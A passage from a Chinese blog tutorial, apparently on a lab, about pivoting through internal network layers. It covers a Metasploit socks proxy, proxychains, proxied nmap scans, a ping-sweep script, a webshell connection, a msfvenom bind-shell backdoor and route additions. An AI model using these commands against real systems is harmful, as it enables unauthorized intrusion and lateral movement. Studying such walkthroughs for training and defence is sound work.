我猜你也在找内网渗透,这篇难道还不够你嚼烂?( 二 )

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 
使用MSF建立socks代理use auxiliary/server/socks4a
set srvhost 192.168.85.128
set srvport 10080
run
我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 
配置socks4代理的相关客户端Proxychains
在配置文件/etc/proxychains.conf中添加:
socks4 192.168.85.128 10080
vi /etc/proxychains.conf
我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 
添加socks4 192.168.85.128 10080
我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 
这样利用proxychains启动的应用都可以带sock4代理,proxychains 为kali自带的,非MSF里的 。
建立好代理后渗透机可以通过这台Linux当跳板机进入第二层网络
第二层网络nmap探测存在web服务的主机
用proxychans启动nmap对第二层网段进行80端口扫描,执行proxychains nmap -sT -Pn -p 80 172.10.10.0/24
我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 
扫描发现55和56存在web服务,172.10.10.56即为第二层网络的ip
我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 
由于proxychains无法代理icmp的数据包,所以必须添加-sT -Pn参数,即不检测主机是否存活,直接进行端口tcp扫描 。
脚本探测存活主机
在本地创建一个名为ping.sh的脚本,脚本内容如下:
#!/bin/baship=”172.10.10.”echo “ping log:” > ./ping.txtfor i in {1..254}doping -c 1 -w 1 -W 1 $ip$i | grep -q “ttl=” && echo “$ip$i [yes]” >> ./ping.txt || echo “$ip$i [no]” >> ./ping.txt &doneecho “wait 5s….”sleep 5cat ./ping.txtcat ./ping.txt | wc -l
我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 
Kali进入session1会话,然后upload命令上传刚刚创建的脚本到靶机upload /root/ping.sh /var/www/hrml/upload
我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 
进入shell执行
Python -c ‘import pty;pty.spawn(“/bin/bash”)’
创建一个完全交互式shell,后
Chmod 777 ping.sh
./ping.sh
可以看到172.10.10.0/24网段存活56.57两台
我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 
知道存活主机ip后就可以继续进入第二层内网主机
渗透机浏览器配置sock4a代理
我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 
蚁剑加代理连接
我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 
连接
http://172.10.10.56/upload/php1.php
我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 
进一步做内网渗透,继续上传msf后门
制作MSF后门
返回kali msf 输入
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4455 -f elf > mshell1.elf
生成 mshell1.elf后门文件
我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 
因为在内网跨网段时无法反向代理连接到渗透的机器,所以这里使用
linux/x64/meterpreter/bind_tcp 这个payload进行正向代理连接 。
蚁剑上传后门
我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 

我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 
蚁剑打开虚拟终端执行后门文件
我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 
返回会话
我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 
输入ifconfig 发现第三层网络的网段10.10.10.0/24
我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 
第三层网络添加路由background
route add 10.10.10.0/24 2
route print
我猜你也在找内网渗透,这篇难道还不够你嚼烂?

文章插图
 
进入session 2 上传 脚本 探测存活主机
注意把脚本的ip段修改成该网段再上传
我猜你也在找内网渗透,这篇难道还不够你嚼烂?


推荐阅读